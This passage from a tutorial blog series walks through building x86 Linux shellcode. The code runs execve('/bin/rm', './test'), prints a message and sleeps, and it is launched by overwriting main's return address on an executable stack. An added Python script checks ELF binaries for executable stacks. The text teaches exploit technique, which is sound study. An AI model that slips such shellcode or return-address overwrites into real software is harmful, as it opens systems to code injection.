<span style="font-family: 'Courier New',Courier,monospace;">P.S. Since the stack grows down, the elements are pushed in reverse order so that %esp ends up pointing at argv[0]. The memory layout is shown in figure 1.</span><br />
<div style="font-family: "Courier New",Courier,monospace;"><b><figure 1> </b></div><div style="font-family: "Courier New",Courier,monospace;"><b>low ------------------------------------------ high</b></div><div style="font-family: "Courier New",Courier,monospace;"><b>|address of "/bin/rm"| address of "./test" | NULL</b></div><div style="font-family: "Courier New",Courier,monospace;"><b>| %ebx | %esi | %eax</b></div><div><br />
</div><div>After doing the above steps, I can move the parameters into the registers that int $0x80 expects.</div><div><span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">1. %ebx already contains the address of "/bin/rm", which is the first argument (filename), so there is no need to set it again.</span></div><div><span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">2. </span><span class="Apple-style-span" style="color: #38761d; font-family: 'Courier New',Courier,monospace;">movl %esp,%ecx; </span></div><div><span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">%esp points at the array we just built on the stack, so this stores the address of argv in %ecx. This instruction corresponds to </span><span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;"><i><b>execve(argv[0],<span class="Apple-style-span" style="color: #38761d;">argv</span>,NULL);</b></i></span></div><div><span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">3. <span style="color: #38761d;">xorl %edx, %edx</span></span><span class="Apple-style-span" style="color: #38761d; font-family: 'Courier New',Courier,monospace;">; </span></div><div><span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">store the NULL pointer for envp in %edx. This instruction corresponds to </span><span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;"><i><b>execve(argv[0],argv,<span class="Apple-style-span" style="color: #38761d;">NULL</span>);</b></i></span></div><div>And now it's time to compile the source code and execute it.</div><div>Use objdump to copy the machine code into the new source file. (If you don't know how to do that, see the previous shell code posts.)</div><div><span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">execve3.c</span></div><div><pre style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; background-color: #f6f8ff; color: #000020; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px;">
<span style="color: #200080; font-weight: bold;">char</span> shellcode<span style="color: #308080;">[</span><span style="color: #308080;">]</span> <span style="color: #308080;">=</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xeb</span><span style="color: #0f69ff;">\x22</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\x31</span><span style="color: #0f69ff;">\xc0</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\x5e</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\x89</span><span style="color: #0f69ff;">\xf3</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\x8d</span><span style="color: #0f69ff;">\x76</span><span style="color: #0f69ff;">\x08</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\x50</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\x56</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\x53</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xb8</span><span style="color: #0f69ff;">\x0b</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\x89</span><span style="color: #0f69ff;">\xe1</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\x31</span><span style="color: #0f69ff;">\xd2</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xcd</span><span style="color: #0f69ff;">\x80</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xb8</span><span style="color: #0f69ff;">\x01</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xbb</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xcd</span><span style="color: #0f69ff;">\x80</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xe8</span><span style="color: #0f69ff;">\xd9</span><span style="color: #0f69ff;">\xff</span><span style="color: #0f69ff;">\xff</span><span style="color: #0f69ff;">\xff</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #1060b6;">/bin/rm</span><span style="color: #0f69ff;">\x0</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #1060b6;">./test</span><span style="color: #0f69ff;">\x0</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: maroon;">"</span><span style="color: #406080;">;</span>
<span style="color: #200080; font-weight: bold;">void</span> <span style="color: #400000;">main</span><span style="color: #308080;">(</span><span style="color: #308080;">)</span> <span style="color: #406080;">{</span>
<span style="color: #200080; font-weight: bold;">int</span> <span style="color: #308080;">*</span>ret<span style="color: #406080;">;</span>
<span style="color: #595979;">/* overflow the return address */</span>
ret <span style="color: #308080;">=</span> <span style="color: #308080;">(</span><span style="color: #200080; font-weight: bold;">int</span> <span style="color: #308080;">*</span><span style="color: #308080;">)</span><span style="color: #308080;">&</span>ret <span style="color: #308080;">+</span> <span style="color: #008c00;">2</span><span style="color: #406080;">;</span>
<span style="color: #308080;">(</span><span style="color: #308080;">*</span>ret<span style="color: #308080;">)</span> <span style="color: #308080;">=</span> <span style="color: #308080;">(</span><span style="color: #200080; font-weight: bold;">int</span><span style="color: #308080;">)</span>shellcode<span style="color: #406080;">;</span>
<span style="color: #406080;">}</span></pre></div><div><span class="Apple-style-span" style="font-family: inherit;">Compile the source code, use execstack to mark the stack executable, and run it. You will see that the result is what we expected.</span></div><div><span class="Apple-style-span" style="font-family: inherit;"><br />
</span></div><div><b><i>Actually, the execve system call is very dangerous. The example above only uses /bin/rm to remove a file; if someone used /bin/sh to spawn a new shell instead, the consequences would be unpredictable.</i></b></div><div>After verifying the result, let's now combine the whole code together.</div><div><br />
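The execstack step above changes exactly one thing in the binary: the PF_X bit of the PT_GNU_STACK program header (execstack -s sets it, execstack -c clears it; readelf -lW shows it as GNU_STACK with flags RWE). The following Python checker is an added example, not the post's code: it reads that bit directly from ELF32 and ELF64 images so you can audit a build tree or a suspicious binary for executable stacks. The make_elf helper and the images it builds are constructed for the test only and are not loadable programs.

```python
"""Audit an ELF image for an executable stack (what `execstack -s` turns on)."""
import struct
import sys

PT_GNU_STACK = 0x6474E551          # p_type GNU toolchains use for stack permissions
PF_X, PF_W, PF_R = 0x1, 0x2, 0x4   # p_flags bits


def _program_headers(data):
    """Yield (p_type, p_flags) for each program header of an ELF image."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    ei_class, ei_data = data[4], data[5]
    if ei_data not in (1, 2):
        raise ValueError("unknown ELF data encoding")
    end = "<" if ei_data == 1 else ">"
    if ei_class == 1:                                   # ELF32 header layout
        e_phoff = struct.unpack_from(end + "I", data, 28)[0]
        e_phentsize, e_phnum = struct.unpack_from(end + "HH", data, 42)
        fmt, flags_idx = end + "IIIIIIII", 6            # p_flags is the 7th Elf32_Phdr field
    elif ei_class == 2:                                 # ELF64 header layout
        e_phoff = struct.unpack_from(end + "Q", data, 32)[0]
        e_phentsize, e_phnum = struct.unpack_from(end + "HH", data, 54)
        fmt, flags_idx = end + "IIQQQQQQ", 1            # p_flags directly follows p_type
    else:
        raise ValueError("unknown ELF class")
    for n in range(e_phnum):
        fields = struct.unpack_from(fmt, data, e_phoff + n * e_phentsize)
        yield fields[0], fields[flags_idx]


def gnu_stack_state(data):
    """Return 'exec', 'noexec' or 'absent' for the PT_GNU_STACK header.

    'absent' deserves a flag too: with no PT_GNU_STACK the kernel applies its
    default, which on older x86 Linux was an executable stack.
    """
    for p_type, p_flags in _program_headers(data):
        if p_type == PT_GNU_STACK:
            return "exec" if p_flags & PF_X else "noexec"
    return "absent"


def check_file(path):
    with open(path, "rb") as f:
        return gnu_stack_state(f.read())


def make_elf(ei_class, stack_flags, p_type=PT_GNU_STACK, little_endian=True):
    """Constructed test image: an ELF header plus one program header, nothing else."""
    end = "<" if little_endian else ">"
    ident = b"\x7fELF" + bytes([ei_class, 1 if little_endian else 2, 1]) + b"\x00" * 9
    if ei_class == 1:
        # e_type, e_machine, e_version, e_entry, e_phoff, e_shoff, e_flags,
        # e_ehsize, e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx
        hdr = ident + struct.pack(end + "HHIIIIIHHHHHH",
                                  2, 3, 1, 0, 52, 0, 0, 52, 32, 1, 0, 0, 0)
        phdr = struct.pack(end + "IIIIIIII", p_type, 0, 0, 0, 0, 0, stack_flags, 16)
    else:
        hdr = ident + struct.pack(end + "HHIQQQIHHHHHH",
                                  2, 62, 1, 0, 64, 0, 0, 64, 56, 1, 0, 0, 0)
        phdr = struct.pack(end + "IIQQQQQQ", p_type, stack_flags, 0, 0, 0, 0, 0, 16)
    return hdr + phdr


if __name__ == "__main__":
    # Usage: python elfstack.py ./a.out [more binaries...]
    for path in sys.argv[1:]:
        print(f"{path}: stack {check_file(path)}")
```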
</div><div><span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">All.c</span></div><div><pre style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; background-color: #f6f8ff; color: #000020; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px;"><span style="color: #595979;">/* </span>
<span style="color: #595979;"> * The inline assembly mix all the code together.</span>
<span style="color: #595979;"> * It will print a message,</span>
<span style="color: #595979;"> * wait 2 seconds and</span>
<span style="color: #595979;"> * remove a file called test.</span>
<span style="color: #595979;"> */</span>
<span style="color: #200080; font-weight: bold;">int</span> <span style="color: #400000;">main</span><span style="color: #308080;">(</span><span style="color: #308080;">)</span><span style="color: #406080;">{</span>
__asm__<span style="color: #308080;">(</span><span style="color: maroon;">"</span><span style="color: #1060b6;">jmp 2f;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> 1:;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> popl </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">si;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">si, </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">cx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> xorl </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx, </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> mul </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> inc </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movb $0x4, %al;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movb $0x8, </span><span style="color: #0f69ff;">%d</span><span style="color: #1060b6;">l;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> int $0x80;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> xorl </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax, </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> pushl </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movb $0x2, %al;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> pushl </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">sp, </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> xor </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">cx, </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">cx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movb $0xa2, %al;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> int $0x80;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> xorl </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax, </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> leal 0x9(</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">si),</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">si;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> pushl </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">si, </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> leal 0x8(</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">si), </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">si;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> pushl </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">si;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> pushl </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movb $0xb, %al;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">sp, </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">cx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> xor </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">dx, </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">dx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> int $0x80;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> xorl </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx, </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> leal 0x1(</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx), </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> int $0x80;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> 2:;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> call 1b;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> .string \</span><span style="color: maroon;">"</span>Run Han<span style="color: #308080;">!</span><span style="color: maroon;">\"</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> .string </span><span style="color: maroon;">\"</span><span style="color: #308080;">/</span>bin<span style="color: #308080;">/</span>rm\<span style="color: maroon;">"</span><span style="color: #1060b6;">;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> .string </span><span style="color: maroon;">\"</span><span style="color: #308080;">.</span><span style="color: #308080;">/</span>test<span style="color: #308080;"></span><span style="color: maroon;">\"</span><span style="color: #1060b6;">;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> .long 0x0;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> </span><span style="color: maroon;">"</span><span style="color: #308080;">)</span><span style="color: #406080;">;</span>
<span style="color: #200080; font-weight: bold;">return</span> <span style="color: #008c00;">0</span><span style="color: #406080;">;</span>
<span style="color: #406080;">}</span></pre></div><div><span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;"><br />
</span></div><div><span class="Apple-style-span" style="font-family: inherit;">There is not much to say about the source code.</span> I use a few instructions to reduce the code size; I will talk about reducing the code size in the next article.</div><div></div><div>Now compile the source code and use objdump to generate the shellcode.</div><div><span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">All_shell.c</span></div><pre style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; background-color: #f6f8ff; color: #000020; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px;"><span style="color: #200080; font-weight: bold;">char</span> shellcode<span style="color: #308080;">[</span><span style="color: #308080;">]</span> <span style="color: #308080;">=</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xeb</span><span style="color: #0f69ff;">\x39</span><span style="color: maroon;">"</span> <span style="color: #595979;">/*relative jmp*/</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\x5e</span><span style="color: maroon;">"</span> <span style="color: #595979;">/*pop %esi*/</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\x89</span><span style="color: #0f69ff;">\xf1</span><span style="color: maroon;">"</span> <span style="color: #595979;">/*movl %esi, %ecx*/</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\x31</span><span style="color: #0f69ff;">\xdb</span><span style="color: maroon;">"</span> <span style="color: #595979;">/*xor %ebx, %ebx*/</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xf7</span><span style="color: #0f69ff;">\xe3</span><span style="color: maroon;">"</span> <span style="color: #595979;">/*mul %ebx*/</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\x43</span><span style="color: maroon;">"</span> <span style="color: #595979;">/*inc %ebx*/</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xb0</span><span style="color: #0f69ff;">\x04</span><span style="color: maroon;">"</span> <span style="color: #595979;">/*mov $0x4, %al*/</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xb2</span><span style="color: #0f69ff;">\x08</span><span style="color: maroon;">"</span> <span style="color: #595979;">/*mov $0x8, %dl*/</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xcd</span><span style="color: #0f69ff;">\x80</span><span style="color: maroon;">"</span> <span style="color: #595979;">/*int $0x80*/</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xb0</span><span style="color: #0f69ff;">\x02</span><span style="color: maroon;">"</span> <span style="color: #595979;">/*movb $0x2, %al (objdump gave this, not the xorl %eax, %eax of All.c; tv_nsec becomes 2 instead of 0, still about 2 seconds)*/</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\x50</span><span style="color: maroon;">"</span> <span style="color: #595979;">/*pushl %eax*/</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xb0</span><span style="color: #0f69ff;">\x02</span><span style="color: maroon;">"</span> <span style="color: #595979;">/*movb $2, %al*/</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\x50</span><span style="color: maroon;">"</span> <span style="color: #595979;">/*pushl %eax*/</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\x89</span><span style="color: #0f69ff;">\xe3</span><span style="color: maroon;">"</span> <span style="color: #595979;">/*movl %esp, %ebx*/</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\x31</span><span style="color: #0f69ff;">\xc9</span><span style="color: maroon;">"</span> <span style="color: #595979;">/*xor %ecx, %ecx*/</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xb0</span><span style="color: #0f69ff;">\xa2</span><span style="color: maroon;">"</span> <span style="color: #595979;">/*mov $0xa2, %al*/</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xcd</span><span style="color: #0f69ff;">\x80</span><span style="color: maroon;">"</span> <span style="color: #595979;">/*int $0x80*/</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\x31</span><span style="color: #0f69ff;">\xc0</span><span style="color: maroon;">"</span> <span style="color: #595979;">/*xor %eax, %eax*/</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\x8d</span><span style="color: #0f69ff;">\x76</span><span style="color: #0f69ff;">\x09</span><span style="color: maroon;">"</span> <span style="color: #595979;">/*leal 0x09(%esi),%esi*/</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\x50</span><span style="color: maroon;">"</span> <span style="color: #595979;">/*push %eax*/</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\x89</span><span style="color: #0f69ff;">\xf3</span><span style="color: maroon;">"</span> <span style="color: #595979;">/*mov %esi, %ebx*/</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\x8d</span><span style="color: #0f69ff;">\x76</span><span style="color: #0f69ff;">\x08</span><span style="color: maroon;">"</span> <span style="color: #595979;">/*lea 0x8(%esi), %esi*/</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\x56</span><span style="color: maroon;">"</span> <span style="color: #595979;">/*push %esi*/</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\x53</span><span style="color: maroon;">"</span> <span style="color: #595979;">/*push %ebx*/</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xb0</span><span style="color: #0f69ff;">\x0b</span><span style="color: maroon;">"</span> <span style="color: #595979;">/*mov $0xb, %al*/</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\x89</span><span style="color: #0f69ff;">\xe1</span><span style="color: maroon;">"</span> <span style="color: #595979;">/*mov %esp, %ecx*/</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\x8d</span><span style="color: #0f69ff;">\x51</span><span style="color: #0f69ff;">\x04</span><span style="color: maroon;">"</span> <span style="color: #595979;">/*lea 0x4(%ecx), %edx (%ecx equals %esp here, so envp points at the ./test entry; All.c used xor %edx, %edx)*/</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xcd</span><span style="color: #0f69ff;">\x80</span><span style="color: maroon;">"</span> <span style="color: #595979;">/*int $0x80*/</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\x31</span><span style="color: #0f69ff;">\xdb</span><span style="color: maroon;">"</span> <span style="color: #595979;">/*xor %ebx, %ebx*/</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\x8d</span><span style="color: #0f69ff;">\x43</span><span style="color: #0f69ff;">\x01</span><span style="color: maroon;">"</span> <span style="color: #595979;">/*lea 0x1(%ebx), %eax*/</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xcd</span><span style="color: #0f69ff;">\x80</span><span style="color: maroon;">"</span> <span style="color: #595979;">/*int $0x80*/</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xe8</span><span style="color: #0f69ff;">\xc2</span><span style="color: #0f69ff;">\xff</span><span style="color: #0f69ff;">\xff</span><span style="color: #0f69ff;">\xff</span><span style="color: maroon;">"</span> <span style="color: #595979;">/*relative call*/</span>
<span style="color: maroon;">"</span><span style="color: #1060b6;">Run Han!</span><span style="color: #0f69ff;">\x0</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #1060b6;">/bin/rm</span><span style="color: #0f69ff;">\x0</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #1060b6;">./test</span><span style="color: #0f69ff;">\x0</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: maroon;">"</span><span style="color: #406080;">;</span>
<span style="color: #200080; font-weight: bold;">void</span> <span style="color: #400000;">main</span><span style="color: #308080;">(</span><span style="color: #308080;">)</span> <span style="color: #406080;">{</span>
<span style="color: #200080; font-weight: bold;">int</span> <span style="color: #308080;">*</span>ret<span style="color: #406080;">;</span>
ret <span style="color: #308080;">=</span> <span style="color: #308080;">(</span><span style="color: #200080; font-weight: bold;">int</span> <span style="color: #308080;">*</span><span style="color: #308080;">)</span><span style="color: #308080;">&</span>ret <span style="color: #308080;">+</span> <span style="color: #008c00;">2</span><span style="color: #406080;">;</span>
<span style="color: #308080;">(</span><span style="color: #308080;">*</span>ret<span style="color: #308080;">)</span> <span style="color: #308080;">=</span> <span style="color: #308080;">(</span><span style="color: #200080; font-weight: bold;">int</span><span style="color: #308080;">)</span>shellcode<span style="color: #406080;">;</span>
<span style="color: #406080;">}</span></pre><div><div><span class="Apple-style-span" style="font-family: inherit;">Compile it, use execstack to mark the stack executable, and run it. After that you will see the program first print a message, wait about two seconds, and then remove a file called "test".</span></div></div>
Shell code 4 (another trick), published 2011-07-02, by Anonymous<br />
So far, the shell code can print a message and exit the program normally.<br />
Now I add a new feature to the previous shell code program: let the program wait 2 seconds and then exit.<br />
<br />
In order to do this, I need to use a new system call called "nanosleep". (My OS is Ubuntu 10.10.)<br />
Use the following command to see what nanosleep does:<br />
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">man nanosleep</span><br />
<pre style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; background-color: #f6f8ff; color: #000020; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px;"><span style="color: #004a43;">#</span><span style="color: #004a43;">include </span><span style="color: maroon;"><</span><span style="color: #40015a;">time.h</span><span style="color: maroon;">></span>
<span style="color: #200080; font-weight: bold;">int</span> nanosleep<span style="color: #308080;">(</span><span style="color: #200080; font-weight: bold;">const</span> <span style="color: #200080; font-weight: bold;">struct</span> timespec <span style="color: #308080;">*</span>req<span style="color: #308080;">,</span> <span style="color: #200080; font-weight: bold;">struct</span> timespec <span style="color: #308080;">*</span>rem<span style="color: #308080;">)</span><span style="color: #406080;">;</span>
<span style="color: #308080;">.</span><span style="color: #308080;">.</span><span style="color: #308080;">.</span><span style="color: #308080;">.</span>
<span style="color: #200080; font-weight: bold;">struct</span> timespec <span style="color: #406080;">{</span>
<span style="color: #003060;">time_t</span> tv_sec<span style="color: #406080;">;</span> <span style="color: #595979;">/* seconds */</span>
